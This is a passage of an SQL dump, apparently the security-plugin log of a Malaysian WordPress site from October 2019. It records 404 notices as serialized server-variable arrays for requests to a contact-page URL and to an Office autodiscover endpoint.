Safari/537.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:22:\"page_id=18/contact.php\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:15:\"136.243.199.108\";s:11:\"REMOTE_PORT\";s:5:\"56668\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:23:\"https://bintara.com.my/\";s:10:\"SCRIPT_URL\";s:1:\"/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.0\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XZsZAKNnKQNBk6r3IXk02QAAARM\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570445569.0231\";s:12:\"REQUEST_TIME\";s:10:\"1570445569\";}}','notice','2019-10-07 10:52:51','2019-10-07 10:52:49',35021960,36832736,'https://bintara.com.my/?page_id=18/contact.php',1,0,'136.243.199.108'),(27632,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:36:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:24:\"/?page_id=18/contact.php\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_KEEP_ALIVE\";s:2:\"15\";s:15:\"HTTP_USER_AGENT\";s:114:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:22:\"page_id=18/contact.php\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:15:\"136.243.199.108\";s:11:\"REMOTE_PORT\";s:5:\"55887\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:23:\"https://bintara.com.my/\";s:10:\"SCRIPT_URL\";s:1:\"/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.0\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XZsY6Wm4ola1qjywyRVXyQAAAFQ\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570445545.9773\";s:12:\"REQUEST_TIME\";s:10:\"1570445545\";}}','notice','2019-10-07 10:52:27','2019-10-07 10:52:26',35021960,36832736,'https://bintara.com.my/?page_id=18/contact.php',1,0,'136.243.199.108'),(27631,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:36:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:24:\"/?page_id=18/contact.php\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_KEEP_ALIVE\";s:2:\"15\";s:15:\"HTTP_USER_AGENT\";s:114:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:22:\"page_id=18/contact.php\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:15:\"136.243.199.108\";s:11:\"REMOTE_PORT\";s:5:\"55368\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:23:\"https://bintara.com.my/\";s:10:\"SCRIPT_URL\";s:1:\"/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.0\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XZsY0sAZj7RBQ-icbk-ZmwAAAME\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570445522.6938\";s:12:\"REQUEST_TIME\";s:10:\"1570445522\";}}','notice','2019-10-07 10:52:04','2019-10-07 10:52:03',35021960,36832736,'https://bintara.com.my/?page_id=18/contact.php',1,0,'136.243.199.108'),(27629,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:35:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:12:\"/?page_id=18\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:34:\"https://bintara.com.my/?page_id=18\";s:15:\"HTTP_USER_AGENT\";s:114:\"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.181 Safari/537.36 Kinza/4.7.2\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:10:\"page_id=18\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:11:\"89.231.65.6\";s:11:\"REMOTE_PORT\";s:5:\"57737\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:23:\"https://bintara.com.my/\";s:10:\"SCRIPT_URL\";s:1:\"/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.0\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XZsVXqNnKQNBk6r3IXkzRAAAAQg\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570444638.2401\";s:12:\"REQUEST_TIME\";s:10:\"1570444638\";}}','notice','2019-10-07 10:37:20','2019-10-07 10:37:18',35026992,36836936,'https://bintara.com.my/?page_id=18',1,0,'89.231.65.6'),(27630,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:36:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:24:\"/?page_id=18/contact.php\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_KEEP_ALIVE\";s:2:\"15\";s:15:\"HTTP_USER_AGENT\";s:114:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:22:\"page_id=18/contact.php\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:15:\"136.243.199.108\";s:11:\"REMOTE_PORT\";s:5:\"54867\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:23:\"https://bintara.com.my/\";s:10:\"SCRIPT_URL\";s:1:\"/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.0\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XZsYu01o81Ms4j7YQaMz3QAAABE\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570445499.3145\";s:12:\"REQUEST_TIME\";s:10:\"1570445499\";}}','notice','2019-10-07 10:51:41','2019-10-07 10:51:39',35414728,37224544,'https://bintara.com.my/?page_id=18/contact.php',1,0,'136.243.199.108'),(27628,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:12:\"/?page_id=18\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:139:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 Edge/17.17134,gzip(gfe)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:10:\"page_id=18\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"179.61.142.127\";s:11:\"REMOTE_PORT\";s:5:\"57281\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:23:\"https://bintara.com.my/\";s:10:\"SCRIPT_URL\";s:1:\"/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.0\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XZsKSaNnKQNBk6r3IXksVwAAAQE\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570441801.7779\";s:12:\"REQUEST_TIME\";s:10:\"1570441801\";}}','notice','2019-10-07 09:50:05','2019-10-07 09:50:03',35022136,36831704,'https://bintara.com.my/?page_id=18',1,0,'179.61.142.127'),(27627,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:12:\"/?page_id=18\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:113:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3451.0 Safari/537.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:10:\"page_id=18\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"172.83.40.219\";s:11:\"REMOTE_PORT\";s:5:\"44546\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:23:\"https://bintara.com.my/\";s:10:\"SCRIPT_URL\";s:1:\"/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XZsIb7ctZvnRcEsjCpdDTwAAAIw\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570441327.7078\";s:12:\"REQUEST_TIME\";s:10:\"1570441327\";}}','notice','2019-10-07 09:42:11','2019-10-07 09:42:08',35415216,37221376,'https://bintara.com.my/?page_id=18',1,0,'172.83.40.219'),(27626,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:48:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:30:\"/AutoDiscover/autodiscover.xml\";s:14:\"CONTENT_LENGTH\";s:3:\"314\";s:12:\"CONTENT_TYPE\";s:23:\"text/xml; charset=utf-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:72:\"Microsoft Office/16.0 (Windows NT 10.0; Microsoft Excel 16.0.11929; Pro)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:25:\"HTTP_X_OFFICE_APPLICATION\";s:1:\"1\";s:27:\"HTTP_X_OFFICE_AUDIENCEGROUP\";s:8:\"Insiders\";s:27:\"HTTP_X_OFFICE_MAJOR_VERSION\";s:2:\"16\";s:22:\"HTTP_X_OFFICE_PLATFORM\";s:5:\"Win32\";s:23:\"HTTP_X_OFFICE_SESSIONID\";s:36:\"A77C9CD6-DC4A-4FAF-ACBD-27F120D9CFC6\";s:21:\"HTTP_X_OFFICE_VERSION\";s:10:\"16.0.11929\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/autodiscover.xml\";s:19:\"REDIRECT_SCRIPT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZrpFMAZj7RBQ-icbk-SSAAAAMU\";s:12:\"REDIRECT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:11:\"REMOTE_ADDR\";s:15:\"175.142.118.115\";s:11:\"REMOTE_PORT\";s:5:\"50334\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/autodiscover.xml\";s:10:\"SCRIPT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XZrpFMAZj7RBQ-icbk-SSAAAAMU\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570433300.5214\";s:12:\"REQUEST_TIME\";s:10:\"1570433300\";}}','notice','2019-10-07 07:28:22','2019-10-07 07:28:20',35394464,37197576,'https://bintara.com.my/AutoDiscover/autodiscover.xml',1,0,'175.142.118.115'),(27625,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:48:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:30:\"/AutoDiscover/autodiscover.xml\";s:14:\"CONTENT_LENGTH\";s:3:\"314\";s:12:\"CONTENT_TYPE\";s:23:\"text/xml; charset=utf-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:77:\"Microsoft Office/16.0 (Windows NT 10.0; Microsoft PowerPoint 16.0.12026; Pro)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:25:\"HTTP_X_OFFICE_APPLICATION\";s:1:\"3\";s:27:\"HTTP_X_OFFICE_AUDIENCEGROUP\";s:10:\"Production\";s:27:\"HTTP_X_OFFICE_MAJOR_VERSION\";s:2:\"16\";s:22:\"HTTP_X_OFFICE_PLATFORM\";s:5:\"Win32\";s:23:\"HTTP_X_OFFICE_SESSIONID\";s:36:\"95920E31-175C-4166-B561-310D3746F714\";s:21:\"HTTP_X_OFFICE_VERSION\";s:10:\"16.0.12026\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/autodiscover.xml\";s:19:\"REDIRECT_SCRIPT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZrnCGm4ola1qjywyRVD5wAAAEo\";s:12:\"REDIRECT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:11:\"REMOTE_ADDR\";s:15:\"175.142.118.115\";s:11:\"REMOTE_PORT\";s:5:\"50176\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/autodiscover.xml\";s:10:\"SCRIPT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XZrnCGm4ola1qjywyRVD5wAAAEo\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570432776.6279\";s:12:\"REQUEST_TIME\";s:10:\"1570432776\";}}','notice','2019-10-07 07:19:40','2019-10-07 07:19:37',35391824,37194952,'https://bintara.com.my/AutoDiscover/autodiscover.xml',1,0,'175.142.118.115'),(27624,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:48:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:30:\"/AutoDiscover/autodiscover.xml\";s:14:\"CONTENT_LENGTH\";s:3:\"315\";s:12:\"CONTENT_TYPE\";s:23:\"text/xml; charset=utf-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:72:\"Microsoft Office/16.0 (Windows NT 10.0; Microsoft Excel 16.0.11929; Pro)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:25:\"HTTP_X_OFFICE_APPLICATION\";s:1:\"1\";s:27:\"HTTP_X_OFFICE_AUDIENCEGROUP\";s:8:\"Insiders\";s:27:\"HTTP_X_OFFICE_MAJOR_VERSION\";s:2:\"16\";s:22:\"HTTP_X_OFFICE_PLATFORM\";s:5:\"Win32\";s:23:\"HTTP_X_OFFICE_SESSIONID\";s:36:\"0803A88A-358D-45A4-9FF7-38F329175A91\";s:21:\"HTTP_X_OFFICE_VERSION\";s:10:\"16.0.11929\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/autodiscover.xml\";s:19:\"REDIRECT_SCRIPT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZriqrctZvnRcEsjCpc46gAAAIE\";s:12:\"REDIRECT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:11:\"REMOTE_ADDR\";s:15:\"175.142.118.115\";s:11:\"REMOTE_PORT\";s:5:\"58633\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/autodiscover.xml\";s:10:\"SCRIPT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XZriqrctZvnRcEsjCpc46gAAAIE\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570431658.9096\";s:12:\"R